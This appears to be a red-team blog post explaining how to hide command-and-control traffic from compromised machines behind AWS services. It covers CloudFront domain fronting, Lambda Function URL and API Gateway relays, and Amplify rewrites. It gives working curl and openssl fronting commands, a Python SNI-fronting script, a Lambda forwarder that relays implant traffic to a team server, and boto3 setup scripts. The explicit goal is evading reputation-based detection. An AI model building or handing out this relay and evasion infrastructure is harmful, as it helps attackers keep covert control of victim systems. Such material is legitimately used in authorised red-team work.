Recently I’ve been looking into options for abusing AWS services to forward HTTP Command and Control (C2) traffic. This post will talk about a number of approaches for this I found discussed on the Internet as well as a few options that I identified myself.
For those not familiar with how most modern C2 systems work, an overview of their operation might be helpful. Skip ahead a paragraph if you are already familiar with the way C2 systems are designed.
A Command and Control system provides an interface by which commands can be run on already compromised computers in order for attackers to achieve their goals. Specific terms vary, but C2 architecture normally consists of implants that run on compromised devices and execute commands, interfaces that attackers can use to issue commands to be run on compromised devices, and servers that coordinate communications between the two. The C2 server normally sits in a location reachable from the Internet, so victim systems with the C2 implant installed can communicate back to the server to ask for instructions. Depending on the C2 software in question, there will be one or more protocols supported for this purpose. The protocols chosen are repurposed, in that they were originally designed and used for some other benign purpose. This repurposing is done deliberately in order to make the C2 implant communications blend in to normal network traffic. The most commonly supported protocol for implant to server communication in modern C2 systems is HTTP/S.
The use of HTTP/S by C2 is not the only way this protocol is abused for malicious activity, so defenders are paying attention. One approach to try and identify abuse of the protocol is to check the “reputation” of HTTP/S traffic destinations using a source like this (other sources are available). By making use of AWS services that can proxy HTTP traffic, the operator of a C2 server can take advantage of the comparatively “good” reputation of the URLs associated with those AWS services to try and avoid detection. So, my question was, what AWS services can be used in this manner?
I started off this exercise by looking for existing writeups on the topic. I considered out of scope anything that required custom C2 implant communications (e.g. External C2). I wanted forwarding of plain old HTTP/S to give me the widest possible range of options in C2 servers that could be put behind this without requiring code changes.
After a few hours of research, I found the following:
Something that you will see repeated endlessly if you search on this topic is that you can use the CloudFront Content Delivery Network (CDN) to perform domain fronting for C2 services.
Domain fronting is a technique that attempts to hide the true destination of a HTTP request, or redirect traffic to possibly restricted locations, by abusing the HTTP routing capabilities of CDNs or certain other complex network environments. For version 1.1 of the protocol, HTTP involves a TCP connection being made to a destination server on a given IP address (normally associated with a domain name) and port, with additional TLS/SSL encryption support for the connection in HTTPS. Over this connection a structured plain text message is sent that requests a given resource and references a server in the Host header. Under normal circumstances the domain name associated with the TCP connection and the Host header in the HTTP message match. In domain fronting, the domain name used for the TCP connection is set to a site that you want to appear to be visiting, and the Host header in the HTTP request is set to the location you actually want to visit. Both locations must be served by the same CDN.
The following curl command demonstrates in the simplest possible way how the approach is performed in environments that support it. In the example, http://fakesite.cloudfront.net/ is what you want to appear to be visiting, and http://actualsite.cloudfront.net is where you actually want to go:
curl -H 'Host: actualsite.cloudfront.net' http://fakesite.cloudfront.net/
In this example, any DNS requests resolved on the client side resolve the “fake” address, and packet captures will show the TCP traffic going to that fake system’s IP address. If HTTPS is supported, and you use a https:// URL, the actual destination you are visiting, located in the HTTP Host header, will also be hidden in the encrypted tunnel.
While this is a great way of hiding C2 traffic, because domain fronting was widely used to evade censorship restrictions, various CDNs cracked down on the approach a few years ago. Some changes were rolled back in some cases, but as of the time of writing this simple approach to domain fronting does not work in CloudFront for HTTPS. If the DNS hostname that you connect to does not match any of the certificates you have associated with your CloudFront distribution, you will get the following error:
The distribution does not match the certificate for which the HTTPS connection was established with.
This applies only to HTTPS - HTTP still works using the approach shown in the example above. However, given that HTTP exposes the Host header value in the clear in network traffic, this leaves something to be desired when the purpose is hiding where you’re going. Depending on the capability of inspection devices, it might be good enough for certain purposes however.
It is possible to make HTTPS domain fronting work on CloudFront via use of Server Name Indication (SNI) to specify a Server Name value during the TLS negotiation that matches a certificate in your CloudFront distribution. In other words, you TCP connect via HTTPS to a fake site on the CDN and set the SNI servername for the TLS negotiation AND the HTTP Host header to your actual intended host.
Here’s how this connection looks using openssl.
openssl s_client -quiet -connect fakesite.cloudfront.net:443 -servername actualsite.cloudfront.net < request.txt
depth=2 C = US, O = Amazon, CN = Amazon Root CA 1
verify return:1
depth=1 C = US, O = Amazon, CN = Amazon RSA 2048 M01
verify return:1
depth=0 CN = *.cloudfront.net
verify return:1
Where the file request.txt contains something like the following:
GET / HTTP/1.1
Host: actualsite.cloudfront.net
Unfortunately, I’m not aware of any C2 implant that supports specifying the TLS servername in a manner similar to what is shown above, so C2 HTTPS domain fronting using CloudFront is not a viable approach at this time. However, this does not mean that CloudFront is completely unusable for C2. As already mentioned, you can do domain fronting via HTTP. It’s also possible to access the distribution via HTTPS using the <name>.cloudfront.net name that is created randomly for you when you set up your distribution. This domain does have a good trust profile in some URL categorisation databases.
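To make the SNI trick a little more concrete, here is roughly what it looks like from Python using only the standard library. The fakesite/actualsite distribution names are the same hypothetical values used in the openssl example above, so treat this as an illustrative sketch rather than working implant code.

import socket
import ssl

# Hypothetical CloudFront distribution names, matching the openssl example above.
FRONT_HOST = "fakesite.cloudfront.net"    # where DNS resolution and the TCP connection go
REAL_HOST = "actualsite.cloudfront.net"   # used for both the TLS SNI value and the Host header

context = ssl.create_default_context()

# TCP connect to the "front" name, but present the real name in the SNI field.
with socket.create_connection((FRONT_HOST, 443)) as sock:
    with context.wrap_socket(sock, server_hostname=REAL_HOST) as tls:
        request = (
            "GET / HTTP/1.1\r\n"
            f"Host: {REAL_HOST}\r\n"
            "Connection: close\r\n\r\n"
        )
        tls.sendall(request.encode())
        response = b""
        while chunk := tls.recv(4096):
            response += chunk

print(response.decode(errors="replace"))

Because the SNI value matches a certificate served by the distribution (the *.cloudfront.net wildcard in the openssl output above), the TLS handshake succeeds even though the TCP connection was made to the “fake” name.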
With that diversion out of the way, let’s look at the complete list of options I identified for forwarding HTTP traffic using AWS services.
Here’s the list, including the aforementioned approaches I found discussed elsewhere on the Internet, and a few more I identified myself:
*.amplifyapp.com domain.
Out of these, my favorite approach is the API Gateway proxying method. In a coming section, I’ll talk at a high level about how to implement each of these approaches, as well as some of the more relevant details for C2 forwarding that apply. First, however, given that it’s referenced in two of the above options, I want to go over the relevant differences between the two API Gateway types for C2 forwarding.
The API gateway offers two main types of API - REST and HTTP. The API documentation provides a lot of information on choosing between these two types of gateway starting here, but from our perspective of fronting C2 traffic the important points are as follows:
APIs of both types are exposed at an endpoint of the form https://<random_10_chr_str>.execute-api.<region>.amazonaws.com/<path>.
For the REST type, a stage name must be included at the start of the URI path. For example a REST API entrypoint would look like this https://<rest-api>.execute-api.<region>.amazonaws.com/stage_name/, whereas a HTTP one could look like this https://<http-api>.execute-api.<region>.amazonaws.com/. Some C2 servers can deal with additional path information in the URL without a problem, although this does make certain proxying configurations more complex for REST types.
Due to that last point alone, my preference is to use HTTP API gateway types instead of REST ones for C2 forwarding, whether via Lambda or direct proxying, and this is the implementation approach I recommend below in cases where the API gateway is used. This also means that my suggested method for implementing the API Gateway<->Lambda forwarder is different from the Serverless approach discussed in Adam’s post. I think this difference in approach is largely due to the rapid increase in functionality of AWS services over time - I don’t believe the HTTP API Gateway type was available back when Adam originally wrote his post.
The following are instructions on how to implement each of the aforementioned C2 forwarding approaches and a summary of some of their relevant distinguishing features. The assumption I have made with the instructions is that the destination C2 server sits within the same AWS account as the AWS forwarding service being configured, and that you are following a minimal access permission model in your account. I haven’t made any specific assumptions about the rest of the C2 design in your network, although my design involved an additional reverse HTTP proxy that handled all implant HTTP traffic destined for the C2 box. In cases where I refer to an EC2 instance receiving HTTP/S from the AWS service forwarder, this was the box being referred to. If there’s interest, I can do a separate post on this design, but for the purpose of this post I’ve tried to keep the instructions generic.
The instructions are fairly bare bones, listing the minimal configuration settings you need to make the service functional, and assume you have fairly decent knowledge of how AWS networking, IAM and security groups work. You might need to refer to the AWS documentation for specific services to find where a particular referenced setting is configured. These are the manual click-ops steps, but if you want to rapidly deploy and tear down your infrastructure you will obviously want to implement these steps in an Infrastructure as Code format.
Summary
https://<random_32_char_value>.lambda-url.<aws_region>.on.aws
Computer and Internet Info, Low Risk for *.lambda-url.<aws_region>.on.aws URLs
Setup
Scott’s blog post and associated Red Lambda Github repository provide some instructions and CloudFormation code to implement a Lambda/Function URL forwarder and C2 system, but if your design is different it’s helpful to know how to do the Function URL and Lambda setup manually.
Take the Lambda code from Scott’s repository. Depending on when you follow these instructions, you can also use my fork instead, which is awaiting PR acceptance into Scott’s repository and fixes an issue with proper forwarding of binary responses from the backend C2 server. A simplified sketch of what the forwarding code does is included after these setup steps.
Create a new Lambda using the Python 3.7 runtime (later versions will not work due to issues with the Python requests module).
The handler for the Lambda should be set to lambda_function.redirector, assuming a code filename of lambda_function.py.
Set an environment variable of TEAMSERVER to point to the private IP address or name of the HTTPS capable service you want to redirect to.
Associate the appropriate VPC and subnet with the Lambda (these should match the VPC and subnet of the destination EC2 instance) and create a dedicated security group for the Lambda.
Add a security rule to the Security Group for the destination EC2 instance that allows HTTPS from the security group associated with the Lambda.
When creating the Lambda, choose to associate a Function URL with it.
The Lambda execution role should be a custom IAM role with the AWSLambdaExecute managed policy AND the following custom policy attached.
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "LambdaRedir",
      "Effect": "Allow",
      "Action": [
        "ec2:CreateNetworkInterface",
        "ec2:DeleteNetworkInterface",
        "ec2:DescribeInstances",
        "ec2:AttachNetworkInterface",
        "ec2:DescribeNetworkInterfaces"
      ],
      "Resource": "*"
    }
  ]
}
An auto generated Function URL address will be provided in the console once configuration is complete.
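For reference, the logic of such a forwarder is quite small. The following is a simplified sketch - it is not Scott’s actual Red Lambda code - of what a Function URL forwarder handler conceptually does, assuming the TEAMSERVER environment variable described above and the Function URL (HTTP API v2.0 format) event payload:

import base64
import os
import ssl
import urllib.request

# Simplified stand-in for the forwarder logic - not the Red Lambda project code.
# TEAMSERVER is the private IP or name of the backend C2 host, as described above.
TEAMSERVER = os.environ["TEAMSERVER"]

# The backend C2 listener often uses a self-signed certificate, so skip verification here.
_CTX = ssl.create_default_context()
_CTX.check_hostname = False
_CTX.verify_mode = ssl.CERT_NONE


def redirector(event, context):
    http = event["requestContext"]["http"]
    query = event.get("rawQueryString", "")
    url = f"https://{TEAMSERVER}{http['path']}" + (f"?{query}" if query else "")

    body = event.get("body")
    if body is not None and event.get("isBase64Encoded"):
        body = base64.b64decode(body)
    elif body is not None:
        body = body.encode()

    # Rebuild the request against the backend, copying over the original headers.
    req = urllib.request.Request(url, data=body, method=http["method"])
    for name, value in event.get("headers", {}).items():
        if name.lower() not in ("host", "content-length"):
            req.add_header(name, value)

    # Error responses (4xx/5xx) raise exceptions with urllib and are not handled
    # here for brevity.
    with urllib.request.urlopen(req, context=_CTX) as resp:
        payload = resp.read()
        headers = {k: v for k, v in resp.headers.items()
                   if k.lower() not in ("transfer-encoding", "connection")}

    # Base64 encode so binary C2 responses survive the JSON response envelope.
    return {
        "statusCode": resp.status,
        "headers": headers,
        "body": base64.b64encode(payload).decode(),
        "isBase64Encoded": True,
    }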
Summary
https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/
Computer and Internet Info, Low Risk
Setup
As mentioned in the API Gateway section above, I prefer using the HTTP API Gateway type as opposed to the REST type, so my setup approach is different to the way that API Gateway/Lambda forwarding was set up in Adam’s blog post.
The setup is pretty straightforward.
Set up a forwarder Lambda as described in the section above. This Lambda code works with both Function URL and API Gateway triggers. Given you are using API Gateway forwarding, you can skip the step where you enable a Function URL if you like, or leave it if you want both entrypoints enabled.
Create a HTTP API Gateway instance.
Create a /{proxy+} resource for the ANY method.
Add an AWS Lambda integration, pick the region where your Lambda resides and the Lambda name. There will be an option Grant API Gateway permission to invoke your Lambda function which you can leave selected. No authorizer is required.
Create a $default stage and enable automatic deployment.
The invoke URL will be provided on the summary page for the gateway.
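If you would rather script this than click through the console, the same HTTP API and Lambda permission can be created with a couple of boto3 calls. This is a sketch rather than a full deployment script - the region, account ID and Lambda name are placeholder values - and the quick-create call wires up the catch-all route and auto-deployed $default stage for you.

import boto3

# Placeholder assumptions: adjust the region, account ID and Lambda name for your setup.
REGION = "us-east-1"
ACCOUNT_ID = "123456789012"
LAMBDA_NAME = "c2-forwarder"

apigw = boto3.client("apigatewayv2", region_name=REGION)
lam = boto3.client("lambda", region_name=REGION)

lambda_arn = lam.get_function(FunctionName=LAMBDA_NAME)["Configuration"]["FunctionArn"]

# "Quick create" an HTTP API with a catch-all proxy route, a Lambda integration
# and an auto-deployed $default stage in a single call.
api = apigw.create_api(
    Name="c2-http-api",
    ProtocolType="HTTP",
    Target=lambda_arn,
    RouteKey="ANY /{proxy+}",
)

# Allow the API Gateway instance to invoke the forwarder Lambda (the console does
# this for you when the "Grant API Gateway permission" option is left selected).
lam.add_permission(
    FunctionName=LAMBDA_NAME,
    StatementId="apigw-invoke",
    Action="lambda:InvokeFunction",
    Principal="apigateway.amazonaws.com",
    SourceArn=f"arn:aws:execute-api:{REGION}:{ACCOUNT_ID}:{api['ApiId']}/*",
)

print(api["ApiEndpoint"])  # the invoke URL, e.g. https://<id>.execute-api.<region>.amazonaws.com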
Summary
https://<13_character_random_value>.cloudfront.net/
Content Delivery Networks, Low Risk for *.cloudfront.net URLs, or domain dependent for custom domains
Setup
There are dozens of resources on the Internet that describe how to use CloudFront as a forwarder for C2, so I won’t go into detail on how to configure it here; you can check one of the many other resources for detailed instructions. Amongst those linked above, I also used this as a reference when setting up my POC.
I will provide some general notes and tips I had about the creation process.
Using a CloudFront distribution for C2 fronting requires:
Each of the different load balancer options has different characteristics that might influence the right option to choose depending on the environment.
To set up a classic load balancer, add one in the same VPC as the destination EC2 instance, create a dedicated security group, and add a rule to allow traffic to port 80 from the managed prefix list com.amazonaws.global.cloudfront.origin-facing - this allows only traffic from the CloudFront servers to reach the load balancer. The ID of the list can be looked up in the Managed prefix lists section of the VPC console in order to add it to the security group - this was pl-b8a742d1 at the time this post was written. The origin in the CloudFront distribution should then be set to forward traffic using HTTP.
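As an illustration of the security group part of this, the prefix list ID can be looked up and added to an ingress rule with boto3 rather than via the console. The region and security group ID below are placeholder values:

import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # placeholder region

# Look up the CloudFront origin-facing managed prefix list rather than hardcoding its ID.
pls = ec2.describe_managed_prefix_lists(
    Filters=[{"Name": "prefix-list-name",
              "Values": ["com.amazonaws.global.cloudfront.origin-facing"]}]
)
prefix_list_id = pls["PrefixLists"][0]["PrefixListId"]

# Allow HTTP to the load balancer's security group only from CloudFront's origin-facing ranges.
ec2.authorize_security_group_ingress(
    GroupId="sg-0123456789abcdef0",  # placeholder: the load balancer's security group
    IpPermissions=[{
        "IpProtocol": "tcp",
        "FromPort": 80,
        "ToPort": 80,
        "PrefixListIds": [{"PrefixListId": prefix_list_id}],
    }],
)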
If access via a custom domain is required, the domain needs to have an SSL certificate added with all desired names (e.g. domain.com, www.domain.com) for the domain in the us-east-1 (N. Virginia) region. That certificate can then be selected in the Custom SSL Certificate section of the distribution’s settings. The names in the certificate should include all of the Alternate Domain Name (CNAME) entries in the distribution. A link to the appropriate section of the AWS console to create the certificate is shown in the wizard for creating a CloudFront distribution.
Other than the two previously mentioned options, the other important values to set in the distribution relate to forwarding behavior - specifically the caching and allowable HTTP methods. Allow all HTTP methods and use Legacy cache settings selecting All for Headers, Query strings and Cookies.
The distribution domain name will be provided in the settings.
Summary
https://<random_10_char_value>.execute-api.<region_name>.amazonaws.com/
Computer and Internet Info, Low Risk
Setup
The API Gateway direct proxying approach allows you to forward to an Internet accessible URI or a private resource. For cases where the C2 sits in the same AWS account as the forwarding service, a private resource is preferable as it does not require that you expose your C2 service directly on the Internet, and you can save on AWS network traffic transit costs. For a private resource you can forward to a load balancer or a Cloud Map service that points to one or more services running on cloud resources (e.g. web servers on EC2 instances) that you want to receive your forwarded traffic. I chose to use a Cloud Map service pointing to port 80 on an EC2 instance as it was more cost effective than a load balancer. Seeing as the forwarded traffic is internal to my AWS account, I was forwarding it as HTTP, not HTTPS.
The following instructions explain how to set up proxying to a Cloud Map service that will point to a target EC2 instance. Take note of the target EC2 instance’s private IP address, VPC and subnet before starting as these details will be required:
Set up an AWS Cloud Map namespace supporting API calls and DNS queries in VPCs. You can put it in the same VPC as your destination EC2 instance.
Create a Cloud Map API and DNS service within the namespace created in step 1.
Create a service instance within the service created in step 2. This service instance should point to the private IP address of the target EC2 instance and TCP port 80.
Create a security group in the VPC/subnet where the target EC2 instance resides that can be used to associate with a VPC link. This will be used to allow the VPC link and hence the API gateway to talk TO the destination EC2 instance.
Add a rule to the target EC2 instance’s security group that allows connections FROM the security group created in step 4 to the same service port configured in the Cloud Map service instance (e.g. 80/HTTP).
Create an API Gateway VPC link for HTTP APIs to provide a path for the API Gateway to communicate with the VPC and subnet where the destination EC2 instance resides.
Associate the VPC link created in step 6 with the VPC and subnet that the target EC2 instance resides in and the security group created in step 4.
Create an API Gateway HTTP API instance, without creating an initial integration. Keep the default $default deployment stage with automated deployment.
In the new API gateway, create a route with pattern /{proxy+} for the ANY method.
In the new API gateway, create a private resource integration that points to the Cloud Map service created in step 2. Associate the VPC link created in step 6 with the integration.
Attach the integration created in step 10 to the route created in step 9.
The invoke URL will be shown in the stage configuration page.
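For those who prefer to script it, the Cloud Map registration, VPC link, private integration and route portions of the above look roughly like the following in boto3. This is a sketch with placeholder IDs, IP address and ARNs; the namespace, Cloud Map service and HTTP API are assumed to already exist.

import boto3

region = "us-east-1"  # placeholder region
sd = boto3.client("servicediscovery", region_name=region)
apigw = boto3.client("apigatewayv2", region_name=region)

# Register the target EC2 instance's private IP and port against an existing
# Cloud Map service (the service ID is a placeholder).
sd.register_instance(
    ServiceId="srv-0123456789abcdef",
    InstanceId="c2-target",
    Attributes={"AWS_INSTANCE_IPV4": "10.0.0.10", "AWS_INSTANCE_PORT": "80"},
)

# VPC link into the subnet/security group where the target instance lives.
vpc_link = apigw.create_vpc_link(
    Name="c2-vpc-link",
    SubnetIds=["subnet-0123456789abcdef0"],
    SecurityGroupIds=["sg-0123456789abcdef0"],
)

# Private integration pointing at the Cloud Map service via the VPC link,
# then a catch-all route on an existing HTTP API (the API ID is a placeholder).
api_id = "a1b2c3d4e5"
integration = apigw.create_integration(
    ApiId=api_id,
    IntegrationType="HTTP_PROXY",
    IntegrationMethod="ANY",
    ConnectionType="VPC_LINK",
    ConnectionId=vpc_link["VpcLinkId"],
    IntegrationUri="arn:aws:servicediscovery:us-east-1:123456789012:service/srv-0123456789abcdef",
    PayloadFormatVersion="1.0",
)

apigw.create_route(
    ApiId=api_id,
    RouteKey="ANY /{proxy+}",
    Target=f"integrations/{integration['IntegrationId']}",
)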
Summary
https://<stage_name>.<14_character_random_value>.amplifyapp.com/
Business and Economy, Low Risk
Setup
The AWS Amplify fronting method requires an Internet accessible URI to forward traffic to. When you have this you can create an Amplify application with an empty code deployment and then configure rewriting to redirect all requests to the application to your desired site. The site is delivered via CloudFront and visitors to the site won’t be able to tell they are being redirected. Set up like so:
Create an empty code deployment to upload by zipping an (essentially empty) directory, e.g. python -c 'import shutil; shutil.make_archive("test1", "zip", "/tmp/test")'
Create the Amplify application and upload the zip as a manual deployment.
Add a rewrite rule from source /<*> to target https://web.site/<*> (or your custom destination) of type 200 (Rewrite)
Once configured, the URL for the app will be available in a few locations throughout the Amplify interface.
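The same Amplify app can also be stood up from boto3 if you prefer scripting the deployment. The app name, branch name and zip path below are placeholder assumptions, and https://web.site matches the example destination used above:

import boto3
import urllib.request

amplify = boto3.client("amplify", region_name="us-east-1")  # placeholder region

# Create the app with a single rewrite rule sending everything to the real destination.
app = amplify.create_app(
    name="c2-front",
    customRules=[{"source": "/<*>", "target": "https://web.site/<*>", "status": "200"}],
)
app_id = app["app"]["appId"]

# Create a branch and request a manual (zip upload) deployment for it.
branch = "main"
amplify.create_branch(appId=app_id, branchName=branch)
deployment = amplify.create_deployment(appId=app_id, branchName=branch)

# Upload the empty zip produced earlier to the presigned URL, then start the deployment.
with open("test1.zip", "rb") as fh:
    urllib.request.urlopen(
        urllib.request.Request(deployment["zipUploadUrl"], data=fh.read(), method="PUT")
    )
amplify.start_deployment(appId=app_id, branchName=branch, jobId=deployment["jobId"])

# The app URL follows the https://<branch>.<app_id>.amplifyapp.com/ pattern described above.
print(f"https://{branch}.{app['app']['defaultDomain']}/")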